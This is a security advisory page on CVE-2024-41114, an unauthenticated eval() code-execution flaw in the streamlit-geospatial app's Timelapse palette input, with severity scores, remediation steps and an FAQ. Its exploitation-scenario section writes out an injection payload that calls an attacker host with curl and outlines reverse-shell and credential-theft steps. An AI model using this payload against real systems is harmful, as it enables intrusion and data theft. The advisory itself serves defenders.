CVE-2024-41114: streamlit-geospatial: RCE via eval() on palette input

CRITICAL PoC AVAILABLE CISA: ATTEND
Published July 26, 2024
CISO Take

Any exposed instance of streamlit-geospatial is fully compromised with a single HTTP request — no credentials, no complexity. ML/data science teams routinely share Streamlit apps internally without network controls, and this app often runs with cloud credentials in scope. Patch to commit c4f81d9 immediately and audit all Streamlit deployments for eval()/exec() on user input.

Risk Assessment

Critical. CVSS 9.8 with zero prerequisites — unauthenticated, no user interaction, low complexity, network-accessible. Real-world exposure is high because data science teams habitually deploy Streamlit apps without authentication layers. ML infrastructure is high-value post-exploitation: it typically holds cloud credentials in environment variables, has access to data lakes and model registries, and is poorly monitored compared to production systems. This is as exploitable as it gets.

Affected Systems

Package Ecosystem Vulnerable Range Patched
streamlit-geospatial pip No patch
44.4K OpenSSF 7.2 2.8K dependents Pushed 7d ago 8% patched ~0d to patch Full package profile →

Do you use streamlit-geospatial? You're affected.

Severity & Risk

CVSS 3.1
9.8 / 10
EPSS
1.3%
chance of exploitation in 30 days
Higher than 80% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C High
I High
A High

Recommended Action

5 steps
  1. PATCH

    Update to commit c4f81d9616d40c60584e36abb15300853a66e489 or later — the fix replaces eval() with a safe allowlist approach.

  2. ISOLATE

    Immediately restrict network access to any unpatched instance; Streamlit apps must never be internet-exposed without a WAF and authentication.

  3. AUDIT

    Run grep -r 'eval(' across all internal ML/data science apps — this antipattern is widespread in notebooks-turned-apps.

  4. DETECT

    Review web server logs for unusual palette parameter values; monitor for unexpected child processes spawned by Python processes and anomalous outbound connections.

  5. ROTATE

    If the instance was exposed, rotate all credentials accessible from that environment (cloud keys, API tokens, SSH keys).

CISA SSVC Assessment

Decision Attend
Exploitation poc
Automatable Yes
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15(4) - Accuracy, Robustness and Cybersecurity
ISO 42001
A.6.2.6 - AI System Security — Secure Coding and Input Validation
NIST AI RMF
MS-2.5 - AI Risk Treatment — Vulnerability Management
OWASP LLM Top 10
LLM05:2025 - Improper Output Handling

Frequently Asked Questions

What is CVE-2024-41114?

Any exposed instance of streamlit-geospatial is fully compromised with a single HTTP request — no credentials, no complexity. ML/data science teams routinely share Streamlit apps internally without network controls, and this app often runs with cloud credentials in scope. Patch to commit c4f81d9 immediately and audit all Streamlit deployments for eval()/exec() on user input.

Is CVE-2024-41114 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-41114, increasing the risk of exploitation.

How to fix CVE-2024-41114?

1. PATCH: Update to commit c4f81d9616d40c60584e36abb15300853a66e489 or later — the fix replaces eval() with a safe allowlist approach. 2. ISOLATE: Immediately restrict network access to any unpatched instance; Streamlit apps must never be internet-exposed without a WAF and authentication. 3. AUDIT: Run grep -r 'eval(' across all internal ML/data science apps — this antipattern is widespread in notebooks-turned-apps. 4. DETECT: Review web server logs for unusual palette parameter values; monitor for unexpected child processes spawned by Python processes and anomalous outbound connections. 5. ROTATE: If the instance was exposed, rotate all credentials accessible from that environment (cloud keys, API tokens, SSH keys).

What systems are affected by CVE-2024-41114?

This vulnerability affects the following AI/ML architecture patterns: ML UI / data science web apps, Geospatial ML pipelines, Streamlit-based model demos and internal tools, Shared data science infrastructure, Cloud-connected ML compute environments.

What is the CVSS score for CVE-2024-41114?

CVE-2024-41114 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 1.31%.

Technical Details

NVD Description

streamlit-geospatial is a streamlit multipage app for geospatial applications. Prior to commit c4f81d9616d40c60584e36abb15300853a66e489, the `palette` variable on line 430 in `pages/1_📷_Timelapse.py` takes user input, which is later used in the `eval()` function on line 435, leading to remote code execution. Commit c4f81d9616d40c60584e36abb15300853a66e489 fixes this issue.

Exploitation Scenario

An adversary discovers a publicly exposed streamlit-geospatial instance via Shodan or a simple Google dork for 'Streamlit' plus geospatial terms. They navigate to the Timelapse page and submit a palette value of `__import__('os').popen('curl http://attacker.com/beacon').read()`. The eval() on line 435 executes this immediately. They escalate by injecting a reverse shell payload, gaining interactive access to the ML server. Within minutes they enumerate environment variables, find AWS credentials with S3 and SageMaker permissions, exfiltrate training datasets, and deploy a persistent backdoor in a shared model artifact. Total exploit time: under 5 minutes. Zero AI/ML expertise required.

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Timeline

Published
July 26, 2024
Last Modified
November 21, 2024
First Seen
July 26, 2024

Related Vulnerabilities